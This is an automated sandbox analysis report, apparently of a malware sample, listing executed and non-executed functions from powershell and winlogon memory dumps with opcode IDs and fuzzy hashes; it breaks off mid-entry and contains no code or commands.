                                  • Source File: 00000005.00000002.2330681953.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_7ff848e60000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: N_^8$N_^<$N_^?$N_^J$N_^K$N_^N$N_^Q$N_^Y
                                  • API String ID: 0-2388461625
                                  • Opcode ID: c2f823834917604030f606e4ac28406e5d14685f992dda4079306600a8d4c0a4
                                  • Instruction ID: 922e27a44c4728726d6be0ad97921bddf139d38f6e9c7cf8ebecfd16ebed81f9
                                  • Opcode Fuzzy Hash: c2f823834917604030f606e4ac28406e5d14685f992dda4079306600a8d4c0a4
                                  • Instruction Fuzzy Hash: 212107F3A899216EC30937BCBC515E86B81EF543B874941F3E218CF113DA24648B8A96

                                  Executed Functions

                                  Function 00007FF848F46605 Relevance: .4, Instructions: 440COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2496020875.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_7ff848f40000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1a806dcf7342bb2f925fd7ba2578d81b84f2ec8535958ae1527f3ed05aabbc30
                                  • Instruction ID: 4a2168ce9493ea2ff4016d08c16248f386d4bd39b9fa4b0172800d85077f6482
                                  • Opcode Fuzzy Hash: 1a806dcf7342bb2f925fd7ba2578d81b84f2ec8535958ae1527f3ed05aabbc30
                                  • Instruction Fuzzy Hash: E3D16331D0EA8A5FF795AB2858145B5BBE0EF26A94F1801FBD00DDB0D3EE1CA805CB55
                                  Function 00007FF848E79F52 Relevance: .2, Instructions: 189COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2494931660.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_7ff848e70000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 814f16923b156c8ab3e540895fe0c8a1b040e15484e952d36d538a31152e2066
                                  • Instruction ID: 1864f650b0bcaf6d2e85cc9f7b098945edb1faf291dc5cef8a0ab86f55b10f80
                                  • Opcode Fuzzy Hash: 814f16923b156c8ab3e540895fe0c8a1b040e15484e952d36d538a31152e2066
                                  • Instruction Fuzzy Hash: EB511C7790D9D94FD716BB2CE8A60F93B90FF12369F0902B3C4988B093FE291456C659
                                  Function 00007FF848F44073 Relevance: .2, Instructions: 183COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2496020875.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_7ff848f40000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 39da454f7d86a2a8eff49a4877ac2842e76aa316d0bdac91bcd08c33d4903a06
                                  • Instruction ID: 7e4f3084c0eb7d187a93be4dd6eb79c48413139055193b0e03fbf4575d440557
                                  • Opcode Fuzzy Hash: 39da454f7d86a2a8eff49a4877ac2842e76aa316d0bdac91bcd08c33d4903a06
                                  • Instruction Fuzzy Hash: ED51E332A0EA864FE79AEB2C541167477E1EFB5A64F1801BBC00EE71D7DF14E8158349
                                  Function 00007FF848E796FA Relevance: .2, Instructions: 170COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2494931660.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_7ff848e70000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 993f7433998dd23119b1e26c0dbb9b16d2291ccdc30c5e1a6da524ccf910b13d
                                  • Instruction ID: dd56389be203bbea7c3dd9ae2e6fb90bd889b1f7b8c6de42b53570239e3697a2
                                  • Opcode Fuzzy Hash: 993f7433998dd23119b1e26c0dbb9b16d2291ccdc30c5e1a6da524ccf910b13d
                                  • Instruction Fuzzy Hash: 2F513A71D0CB889FE749AB6898055F87BE1FF95710F04827FD45983293DB38A816C786
                                  Function 00007FF848F44370 Relevance: .1, Instructions: 147COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2496020875.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_7ff848f40000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1f85f2e4fd7a92f8a8f1cf1be1ef44a1e6c108d3868585707e647dbee1b68601
                                  • Instruction ID: 582a85d895813752422d20db6b96aaf112b8681a299719ca88c7bee83912b69f
                                  • Opcode Fuzzy Hash: 1f85f2e4fd7a92f8a8f1cf1be1ef44a1e6c108d3868585707e647dbee1b68601
                                  • Instruction Fuzzy Hash: 2E412932E0EA454FE7A9EB2C64106B477E1EF65B64F0801BBD04DE71D7DB18AC108395
                                  Function 00007FF848D5EC60 Relevance: .1, Instructions: 128COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2493809386.00007FF848D5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D5D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_7ff848d5d000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3d3d5479278b2d9006454b262219b0031bc7db81ecc1e4e658f9680dae31a8df
                                  • Instruction ID: 9e4a79d0f07b4758d9b7b387df58822fbb828b3be3ad02ff6355825b95f3d8e9
                                  • Opcode Fuzzy Hash: 3d3d5479278b2d9006454b262219b0031bc7db81ecc1e4e658f9680dae31a8df
                                  • Instruction Fuzzy Hash: 69413B7080EBC44FD756AB299855A623FF0EF57320F1502DFD088CB1A3D625A84AC792
                                  Function 00007FF848E7A47C Relevance: .1, Instructions: 99COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2494931660.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_7ff848e70000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 03dd0c45d078f74c11525ab83f7ae0dccb56a9b9afd11052c20efff03406b01b
                                  • Instruction ID: a48fb5c13e2c6f421f2dd9fcfd61aa37ea644bf19137c8f97b7a632d7ee3f256
                                  • Opcode Fuzzy Hash: 03dd0c45d078f74c11525ab83f7ae0dccb56a9b9afd11052c20efff03406b01b
                                  • Instruction Fuzzy Hash: A4213A3190CB8C8FDB59DBAC984A7E97FF0EB96320F04416FD048C7152DA749456CB92
                                  Function 00007FF848F440BF Relevance: .1, Instructions: 96COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2496020875.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_7ff848f40000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dac3c92f6bf521ebc0ee16b9bb9e7374e037b0d60b023eb26f7d06d8416a89ec
                                  • Instruction ID: 910d85fc160b5d102b1370cc847211fcf091b8eedd0a12b4d7a23ddddafd08b1
                                  • Opcode Fuzzy Hash: dac3c92f6bf521ebc0ee16b9bb9e7374e037b0d60b023eb26f7d06d8416a89ec
                                  • Instruction Fuzzy Hash: D821BF32E0E9874FE7AAEB1C545017466D1FFB4A98F5901BAC01EE71E3CF18DC548249
                                  Function 00007FF848F443BC Relevance: .1, Instructions: 63COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2496020875.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_7ff848f40000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9fb4d12eea974d6c44079dfe0b2b333a06ca8c297abdacb9213a125b52e13e3e
                                  • Instruction ID: 6c9a40a58660a0d82e973836e602035ad899ba674347c7e4006744f578abbb0d
                                  • Opcode Fuzzy Hash: 9fb4d12eea974d6c44079dfe0b2b333a06ca8c297abdacb9213a125b52e13e3e
                                  • Instruction Fuzzy Hash: 27112032E0F8464FE6A4EB2894505B877E0FF60BA8F0800B6D01DE31E6DB18AC108388
                                  Function 00007FF848E733B5 Relevance: .0, Instructions: 49COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2494931660.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_7ff848e70000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                  • Instruction ID: 24ef75c526cb65825109a4e7586d62867e1718cfd4eae63a3c90891dd0916743
                                  • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                  • Instruction Fuzzy Hash: CF01677111CB0D4FDB44EF0CE451AA6B7E0FB95364F50056DE58AC3691DB36E882CB45

                                  Non-executed Functions

                                  Function 00007FF848E78995 Relevance: 5.1, Strings: 4, Instructions: 143COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2494931660.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_7ff848e70000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: M_^$M_^$M_^$M_^
                                  • API String ID: 0-1397233021
                                  • Opcode ID: 791207cde849dfe57d7537278eb9e89962eb9bcf52a6ab3881618a62fb6ce3da
                                  • Instruction ID: 1d6f3babfc94fc21a3f4dd188b9a81cb0f617ebf156b8908998afd5ae7389f4f
                                  • Opcode Fuzzy Hash: 791207cde849dfe57d7537278eb9e89962eb9bcf52a6ab3881618a62fb6ce3da
                                  • Instruction Fuzzy Hash: 894196A390E6D25FE35B973858650E57F90FF62294B0D42F7C188CB0D3EE2C540B965A
                                  Function 00007FF848E78BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2494931660.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_7ff848e70000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: M_^4$M_^7$M_^F$M_^J
                                  • API String ID: 0-622050427
                                  • Opcode ID: 0952385b8bdb8dc4856a798c81327935ad6e11df2551058c8feb274a0171bac6
                                  • Instruction ID: 725765fdab5eb4fc6dc0b808c9c5322b07e5f4148511d7d2ba618ef3c928e049
                                  • Opcode Fuzzy Hash: 0952385b8bdb8dc4856a798c81327935ad6e11df2551058c8feb274a0171bac6
                                  • Instruction Fuzzy Hash: 0F2129F7649865AED30A7B7DF8045E93740DF942B4B8953B2E098CB083FE1470868ED4

                                  Executed Functions

                                  Function 00007FF848F6660A Relevance: .4, Instructions: 450COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2716430119.00007FF848F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7ff848f60000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 49a04190ef7cc227b44bb56a85bcc4d7d1c7095fed06a64fabd2fd6fd2a8ac12
                                  • Instruction ID: 6681e2c6e7311a4cc411863aea394a0edf1240c2dd8a08e6b71092b531483d02
                                  • Opcode Fuzzy Hash: 49a04190ef7cc227b44bb56a85bcc4d7d1c7095fed06a64fabd2fd6fd2a8ac12
                                  • Instruction Fuzzy Hash: E1D13431E0EA8A5FE795AB3858145B5BBE0EF56394F1802FAD00DDB1D3EE1CAC068355
                                  Function 00007FF848F64073 Relevance: .2, Instructions: 182COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2716430119.00007FF848F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7ff848f60000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7cb7a7080bc461838a3793c16ab7ead88bb7c83695535decf4d66dc4b1155e8e
                                  • Instruction ID: c70efd62402867affaa7f054c0084781fc4b0e29e4f8c656c48ddd72886accfb
                                  • Opcode Fuzzy Hash: 7cb7a7080bc461838a3793c16ab7ead88bb7c83695535decf4d66dc4b1155e8e
                                  • Instruction Fuzzy Hash: 8551F332E0DA864FE79ABB2C54116B477E2FFA5260F1812BAC00ED71D7DF14E8068359
                                  Function 00007FF848F64370 Relevance: .1, Instructions: 147COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2716430119.00007FF848F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7ff848f60000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e4ddfacf10f8f36b3af43bb03032326e941076cd81d6d94003cd681ee4cb066f
                                  • Instruction ID: 7a243adc33eb173d9c749c90d11bb13165267c2c7f79033279afda583d15de59
                                  • Opcode Fuzzy Hash: e4ddfacf10f8f36b3af43bb03032326e941076cd81d6d94003cd681ee4cb066f
                                  • Instruction Fuzzy Hash: 19412632E0DA464FEBA9FB2C64126B477E1EF55760F0812BAD04DD71C7EB18AC128395
                                  Function 00007FF848D7EF00 Relevance: .1, Instructions: 130COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2713803798.00007FF848D7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D7D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7ff848d7d000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7de396b223b5d29445aacd96b3a47bc0dc71aea7c85873d6b081411b9a967078
                                  • Instruction ID: 02cb6935eadc9ce40eaf299bea54c590369d144fa166d0588ed7a5e27f602016
                                  • Opcode Fuzzy Hash: 7de396b223b5d29445aacd96b3a47bc0dc71aea7c85873d6b081411b9a967078
                                  • Instruction Fuzzy Hash: 6841297180EBC44FD7569B389855A527FF0EF53360F0902DFD088CB5A3DA25A84AC7A2
                                  Function 00007FF848E99780 Relevance: .1, Instructions: 129COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2715155968.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7ff848e90000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9c2c1cce2f329ea20775bb7848e27a5ce7fc8f20bb71a57dc490bead7a6e7c0e
                                  • Instruction ID: 726e756b1e2d29acbae96726a16543c4d9cf9cfa0c572b9185cbb8cfe84452d1
                                  • Opcode Fuzzy Hash: 9c2c1cce2f329ea20775bb7848e27a5ce7fc8f20bb71a57dc490bead7a6e7c0e
                                  • Instruction Fuzzy Hash: BC31073191CB888FDB1D9F5CAC066B97BE0FB99711F00426FE449D3252CA74A815CBC6
                                  Function 00007FF848E9A49C Relevance: .1, Instructions: 99COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2715155968.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7ff848e90000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6d0857729f95eb3b24d2cb8fd41411c4a45380ae76b0ba7424a005985b37ac2f
                                  • Instruction ID: b56a0db150ad17167931acdb5450ea505a411af9ef12f827d3b0da57e949d700
                                  • Opcode Fuzzy Hash: 6d0857729f95eb3b24d2cb8fd41411c4a45380ae76b0ba7424a005985b37ac2f
                                  • Instruction Fuzzy Hash: 7721F87190CB8C4FEB59DBAC984A7E97FE0EB96321F04416FD048C3152D674A85ACB92
                                  Function 00007FF848F640BF Relevance: .1, Instructions: 95COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2716430119.00007FF848F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7ff848f60000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ab1c4c725fe1a1cefb32df2b67738bee80c2d02a2dc2d89c9a8338c0f3a207df
                                  • Instruction ID: b938ca133ce70b47a15c359e04dd3b6fd8e4c20737e193daf88b0745f63737d1
                                  • Opcode Fuzzy Hash: ab1c4c725fe1a1cefb32df2b67738bee80c2d02a2dc2d89c9a8338c0f3a207df
                                  • Instruction Fuzzy Hash: 4621CE32E0DA875FE7AAFB18945117426E2FF64290F5912BAC01ED71E6CF18EC068349
                                  Function 00007FF848F643BC Relevance: .1, Instructions: 63COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2716430119.00007FF848F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7ff848f60000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dee4d31676f11e8cb1cd900404c804892df61235ce12022b525b526bf8303953
                                  • Instruction ID: b107ef035afeb9385bad036229358389b9afdcd14067c1c264c9a9f1ee1d9e27
                                  • Opcode Fuzzy Hash: dee4d31676f11e8cb1cd900404c804892df61235ce12022b525b526bf8303953
                                  • Instruction Fuzzy Hash: 8D113232E0D9864FE7A5FB2890525B437E0FF20360F0812F6D01DD71D6DB18AC128395
                                  Function 00007FF848E933B5 Relevance: .0, Instructions: 49COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2715155968.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7ff848e90000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                  • Instruction ID: 29c1cfa6bac51b81d075f13f06edf054ad2643bd55ff8ec3c5d015a1cc12a693
                                  • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                  • Instruction Fuzzy Hash: 6C01677115CB0D4FDB44EF0CE451AA6B7E0FB95364F10056DE58AC3661DB36E882CB45
                                  Function 00007FF848E9A0FB Relevance: .0, Instructions: 39COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2715155968.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7ff848e90000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e8d9118d3c28183b2c64ec3b2d3c478aa8158a9d856a2cc1701744669ebe0cf6
                                  • Instruction ID: fff248a98c01939f8d93fd408ef7284ad0608de032ad1b4208c2601d69cbca56
                                  • Opcode Fuzzy Hash: e8d9118d3c28183b2c64ec3b2d3c478aa8158a9d856a2cc1701744669ebe0cf6
                                  • Instruction Fuzzy Hash: 48F0F67654DA8C4FDB81EF2C98690D47FD0FF65218B0502ABD408C7061EB719948C781

                                  Non-executed Functions

                                  Function 00007FF848E98BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2715155968.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7ff848e90000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: K_^8$K_^<$K_^?$K_^J$K_^K$K_^N$K_^Q$K_^Y
                                  • API String ID: 0-2350917820
                                  • Opcode ID: 4d511a56c9d75752d4573350cecfee82ab797f1e65113e8d56fb972c6edfed05
                                  • Instruction ID: 444569eb3d96cba44d8e31ac74dbc91df50d930669615525f43429644e5a31e4
                                  • Opcode Fuzzy Hash: 4d511a56c9d75752d4573350cecfee82ab797f1e65113e8d56fb972c6edfed05
                                  • Instruction Fuzzy Hash: D621F6F3A889157ECA0A36BDF8415E87791EF543B874952F3E018DF113DE24A48B8A94

                                  Executed Functions

                                  Function 00007FF848E907FA Relevance: 2.6, Strings: 2, Instructions: 140COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2794920253.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7ff848e90000_winlogon.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: <L_^$_
                                  • API String ID: 0-2684969648
                                  • Opcode ID: a98554c0fe75805a6bfbcd2914187e7134f1c5431fb945cd1dcc8106e789003e
                                  • Instruction ID: 76b9bba048520488ca2f7e1c6b6564dff8c57634f553c7b868b135b441b2b2ab
                                  • Opcode Fuzzy Hash: a98554c0fe75805a6bfbcd2914187e7134f1c5431fb945cd1dcc8106e789003e
                                  • Instruction Fuzzy Hash: 22415962649A895FE308BB2CB4620FD3FA1FF85350F5841BAD809C73C7DE20684987A5
                                  Function 00007FF848E910FA Relevance: .7, Instructions: 690COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2794920253.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7ff848e90000_winlogon.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 54852ceac2da2e5638f0212cc7c0147dc2fff5da6ebc24f21700ff164d8cc83a
                                  • Instruction ID: ddd1d36ada1144f67b18cd5d675b20227366850cae72bfe7a7ed4f529d57a642
                                  • Opcode Fuzzy Hash: 54852ceac2da2e5638f0212cc7c0147dc2fff5da6ebc24f21700ff164d8cc83a
                                  • Instruction Fuzzy Hash: A812F321E1D94A5FEB98FB7890252BD77D2FF48784F4805B9D40EC32C7DE29A8018755
                                  Function 00007FF848E91120 Relevance: .6, Instructions: 624COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2794920253.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7ff848e90000_winlogon.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b30164d6c9a4e3f6cd23875c5f1fe08b4dd39d26c86d6bf16426d5d804ae57d2
                                  • Instruction ID: 80d1b4bd1c20874fc851cb7bac48ff79c876d298c73bc78633d617e6e5e73760
                                  • Opcode Fuzzy Hash: b30164d6c9a4e3f6cd23875c5f1fe08b4dd39d26c86d6bf16426d5d804ae57d2
                                  • Instruction Fuzzy Hash: 2B02E021E1D94A5FEB98FB7890292BD77E2FF48784F8405B9D40EC32C7DE69A8018745
                                  Function 00007FF848E9190E Relevance: .2, Instructions: 180COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2794920253.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7ff848e90000_winlogon.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 422361382230994ba56844718121324ea8bdee3843f79a0947f7b76ad71818f4
                                  • Instruction ID: 5c33ccd299f5a62e029aae503d9bdf61042906a2a2788e47140ea888fae0c2de
                                  • Opcode Fuzzy Hash: 422361382230994ba56844718121324ea8bdee3843f79a0947f7b76ad71818f4
                                  • Instruction Fuzzy Hash: C651E220A0EAC91FE386A7785869275BFD2EF9A650B0801FFE04DC72A7CD595C06C312
                                  Function 00007FF848E90C5E Relevance: .2, Instructions: 177COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2794920253.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7ff848e90000_winlogon.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9998878ffb0ffda2b8f134c107bbd24673de32f8131219c9190aaac8c14084f4
                                  • Instruction ID: e34c05017f6e67ec1d24867fc24fdba1225498041a894d447362f5eb1c4db1ba
                                  • Opcode Fuzzy Hash: 9998878ffb0ffda2b8f134c107bbd24673de32f8131219c9190aaac8c14084f4
                                  • Instruction Fuzzy Hash: C8513821A1EA8A1FE396B73C58162793BE1EF86650B4900FAD48CC71A7DD5C5C428312
                                  Function 00007FF848E90588 Relevance: .1, Instructions: 136COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2794920253.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7ff848e90000_winlogon.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2d446f7fd71490e07282537e9ee8fca7df04ae6b1c1609162833c6e17905f523
                                  • Instruction ID: 2e5c146d028dd2e58291c7b3e9a18ebcafd20cabf728dfe8c72fb015ea01ca72
                                  • Opcode Fuzzy Hash: 2d446f7fd71490e07282537e9ee8fca7df04ae6b1c1609162833c6e17905f523
                                  • Instruction Fuzzy Hash: A431E220B1D9495FE798EB2C946A279B6C2EF9C755F0801BEE00EC3297DE689C418341
                                  Function 00007FF848E90AF1 Relevance: .1, Instructions: 123COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2794920253.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7ff848e90000_winlogon.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2fa7acd8e7bda1cca213dddc6187a2c3cf2f6167ebf9ffaf5901d55b49d108a7
                                  • Instruction ID: 7bc5a24f3a6a024834731511992f5fc2c6b57090cb8f917e8e1081258926b38b
                                  • Opcode Fuzzy Hash: 2fa7acd8e7bda1cca213dddc6187a2c3cf2f6167ebf9ffaf5901d55b49d108a7
                                  • Instruction Fuzzy Hash: 1831F421E1CD0A5FE788BBB8585A3B9B6D1FF98785F544176E00DC3283DF2868018B52
                                  Function 00007FF848E909A9 Relevance: .1, Instructions: 113COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2794920253.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7ff848e90000_winlogon.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 83ba5a0207d450670f036ed36d689e1ff3a7bc282e49bf432718031162f16348
                                  • Instruction ID: a6fbe7c7a6060ca3e8585c2ce966302df21af33b8bab1d3701cd561a81b0cf40
